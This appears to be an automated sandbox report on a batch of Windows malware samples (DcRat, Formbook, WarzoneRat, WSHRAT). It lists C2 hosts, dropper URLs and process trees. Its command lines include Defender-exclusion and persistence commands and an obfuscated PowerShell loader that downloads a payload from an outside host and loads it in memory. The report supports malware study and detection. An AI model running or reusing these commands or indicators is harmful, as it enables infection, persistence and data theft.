dcrat | e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a

Analysis

max time kernel
68s
max time network
577s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
17-08-2023 19:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2023-08-17-18.zip
Size

65.4MB
MD5

e989e0c721a60d4e1eb0c06214bd4582
SHA1

cce7ee0dc97c078c1206598e5a2a12dbd7510ee9
SHA256

e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a
SHA512

13ff605cafaee947c28309b31a852fac8965a161bc7f8837dd70e5c8e8ee10935663d2ec7198952670b0b55ec6fbd7e678004be811d929a328aa26a31a74beb7
SSDEEP

1572864:Qf79S6fYpAV7OKRyWIoHRb7EX2oPS37BGMXWT8HC/u:Qf7iAVqKRyW9HR7zLBG7T0yu

Score

10^/10

dcrat formbook warzonerat wshrat sy22 infostealer rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

exe.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

Extracted

Family

warzonerat

chongmei33.publicvm.com:49746

Extracted

Family

formbook

Version

4.1

Campaign

sy22

Decoy

vinteligencia.com

displayfridges.fun

completetip.com

giallozafferrano.com

jizihao1.com

mysticheightstrail.com

fourseasonslb.com

kjnala.shop

mosiacwall.com

vandistreet.com

gracefullytouchedartistry.com

hbiwhwr.shop

mfmz.net

hrmbrillianz.com

funwarsztat.com

polewithcandy.com

ourrajasthan.com

wilhouettteamerica.com

johnnystintshop.com

asgnelwin.com

Extracted

Family

wshrat

http://chongmei33.publicvm.com:7045

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook
WSHRAT
WSHRAT is a variant of Houdini worm and has vbs and js variants.
trojan wshrat
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

DCRat payload 8 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000600000002324f-419.dat	dcrat
behavioral1/files/0x000600000002324f-420.dat	dcrat
behavioral1/files/0x000a00000001da41-439.dat	dcrat
behavioral1/files/0x000a00000001da41-440.dat	dcrat
behavioral1/files/0x000a00000001da41-438.dat	dcrat
behavioral1/memory/548-441-0x0000000000F70000-0x0000000001064000-memory.dmp	dcrat
behavioral1/files/0x0006000000023250-1126.dat	dcrat
behavioral1/files/0x0006000000023250-1127.dat	dcrat

Formbook payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/1520-840-0x0000000000400000-0x000000000042F000-memory.dmp	formbook

Warzone RAT payload 5 IoCs

rat

resource	yara_rule
behavioral1/files/0x000f00000001d9fc-625.dat	warzonerat
behavioral1/files/0x000f00000001d9fc-629.dat	warzonerat
behavioral1/files/0x000f00000001d9fc-632.dat	warzonerat
behavioral1/files/0x000200000001e495-650.dat	warzonerat
behavioral1/files/0x000200000001e495-651.dat	warzonerat

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
90	api.ipify.org
91	api.ipify.org
97	checkip.dyndns.org
114	api.ipify.org
117	api.ipify.org
144	checkip.dyndns.org
62	ip-api.com

Program crash 7 IoCs

pid	pid_target	Process	procid_target
1948	4088	WerFault.exe	125
4944	388	WerFault.exe	9
4448	4608	WerFault.exe	214
1744	3740	WerFault.exe	219
3988	3204	WerFault.exe	229
556	3204	WerFault.exe	229
2168	4412	WerFault.exe	239

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
236	schtasks.exe
316	schtasks.exe

Gathers network information 2 TTPs 2 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4776	ipconfig.exe
180	ipconfig.exe

Office document contains embedded OLE objects 1 IoCs

Detected embedded OLE objects in Office documents.

resource	yara_rule
behavioral1/files/0x00060000000231f9-365.dat	office_ole_embedded

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4640	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1712	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeRestorePrivilege	2316	7zG.exe
Token: 35	2316	7zG.exe
Token: SeSecurityPrivilege	2316	7zG.exe
Token: SeSecurityPrivilege	2316	7zG.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2316	7zG.exe
1712	EXCEL.EXE
1712	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE
1712	EXCEL.EXE

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip
1⤵
PID:544

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1684

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-08-17-18\" -spe -an -ai#7zMap7070:84:7zEvent9404
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2316

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1712

C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe
"C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe"
1⤵
PID:3512
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"
  2⤵
  PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
    3⤵
    PID:520
  - - C:\comRuntimeCrtdll\agentbrowser.exe
      "C:\comRuntimeCrtdll\agentbrowser.exe"
      4⤵
      PID:548

C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
1⤵
PID:4104
- C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
  2⤵
  PID:1916
- C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
  2⤵
  PID:4748
- C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
  2⤵
  PID:4236
- C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
  2⤵
  PID:3032

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar"
1⤵
PID:4420

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js"
1⤵
PID:2816
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"
  2⤵
  PID:2288
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"
    3⤵
    PID:4860
  - - C:\Users\Admin\AppData\Local\Tempwinlogon.exe
      "C:\Users\Admin\AppData\Local\Tempwinlogon.exe"
      4⤵
      PID:1048
    - - C:\ProgramData\images.exe
        
        "C:\ProgramData\images.exe"
        5⤵
        
        PID:2036
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe"
        6⤵
        
        PID:4264

C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe"
1⤵
PID:2944
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /release
  2⤵
  PID:1252
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /release
    3⤵
    - Gathers network information
    PID:4776
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ipconfig /renew
  2⤵
  PID:3428
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /renew
    3⤵
    - Gathers network information
    PID:180
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  2⤵
  PID:2332

C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
1⤵
PID:2672
- C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
  2⤵
  PID:4940
- C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
  2⤵
  PID:3856

C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"
1⤵
PID:1356
- C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"
  2⤵
  PID:5036

C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe
"C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe"
1⤵
PID:2772
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:4640
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1324
    3⤵
    - Program crash
    PID:1948

C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"
1⤵
PID:3516
- C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"
  2⤵
  PID:2460

C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"
1⤵
PID:3028
- C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"
  2⤵
  PID:1520

C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe
"C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe"
1⤵
PID:468
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe"
  2⤵
  PID:1064
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uiVprBevwjFGG" /XML "C:\Users\Admin\AppData\Local\Temp\tmp50E0.tmp"
  2⤵
  - Creates scheduled task(s)
  PID:236
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  PID:1224

C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe
"C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe"
1⤵
PID:4336

C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe
"C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe"
1⤵
PID:4304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4088 -ip 4088
1⤵
PID:2880

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf" /o ""
1⤵
PID:2296

C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"
1⤵
PID:1696
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe"
  2⤵
  PID:4864
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\szBUFHBkBccpfd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp91D1.tmp"
  2⤵
  - Creates scheduled task(s)
  PID:316
- C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"
  2⤵
  PID:2636

C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe
"C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe"
1⤵
PID:4324
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
  2⤵
  PID:3004

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx"
1⤵
PID:440

C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe"
1⤵
PID:1800

C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"
1⤵
PID:5008
- C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"
  2⤵
  PID:3664

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs"
1⤵
PID:400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"
  2⤵
  PID:2816
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:4640
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"
    3⤵
    PID:1468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')
      4⤵
      PID:2668
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DY#@$#Mw#@$#v#@$#DY#@$#Mg#@$#x#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#dQBu#@$#Gk#@$#dgBl#@$#HI#@$#cwBv#@$#F8#@$#dgBi#@$#HM#@$#LgBq#@$#H#@$##@$#ZQBn#@$#D8#@$#MQ#@$#2#@$#Dk#@$#M#@$##@$#5#@$#DM#@$#MQ#@$#4#@$#DU#@$#NQ#@$#n#@$#Ds#@$#J#@$#B3#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#g#@$#D0#@$#I#@$#BO#@$#GU#@$#dw#@$#t#@$#E8#@$#YgBq#@$#GU#@$#YwB0#@$#C#@$##@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBO#@$#GU#@$#d#@$##@$#u#@$#Fc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#LgBE#@$#G8#@$#dwBu#@$#Gw#@$#bwBh#@$#GQ#@$#R#@$#Bh#@$#HQ#@$#YQ#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FU#@$#cgBs#@$#Ck#@$#Ow#@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBU#@$#GU#@$#e#@$#B0#@$#C4#@$#RQBu#@$#GM#@$#bwBk#@$#Gk#@$#bgBn#@$#F0#@$#Og#@$#6#@$#FU#@$#V#@$#BG#@$#Dg#@$#LgBH#@$#GU#@$#d#@$#BT#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#FM#@$#V#@$#BB#@$#FI#@$#V#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#EU#@$#TgBE#@$#D4#@$#Pg#@$#n#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#p#@$#Ds#@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#Ek#@$#bgBk#@$#GU#@$#e#@$#BP#@$#GY#@$#K#@$##@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwBl#@$#C#@$##@$#M#@$##@$#g#@$#C0#@$#YQBu#@$#GQ#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwB0#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#Kw#@$#9#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#u#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#I#@$##@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#Ow#@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#FM#@$#dQBi#@$#HM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Cw#@$#I#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ck#@$#Ow#@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBD#@$#G8#@$#bgB2#@$#GU#@$#cgB0#@$#F0#@$#Og#@$#6#@$#EY#@$#cgBv#@$#G0#@$#QgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#KQ#@$#7#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBS#@$#GU#@$#ZgBs#@$#GU#@$#YwB0#@$#Gk#@$#bwBu#@$#C4#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#F0#@$#Og#@$#6#@$#Ew#@$#bwBh#@$#GQ#@$#K#@$##@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#Ck#@$#Ow#@$#k#@$#HQ#@$#eQBw#@$#GU#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bs#@$#G8#@$#YQBk#@$#GU#@$#Z#@$#BB#@$#HM#@$#cwBl#@$#G0#@$#YgBs#@$#Hk#@$#LgBH#@$#GU#@$#d#@$#BU#@$#Hk#@$#c#@$#Bl#@$#Cg#@$#JwBG#@$#Gk#@$#YgBl#@$#HI#@$#LgBI#@$#G8#@$#bQBl#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#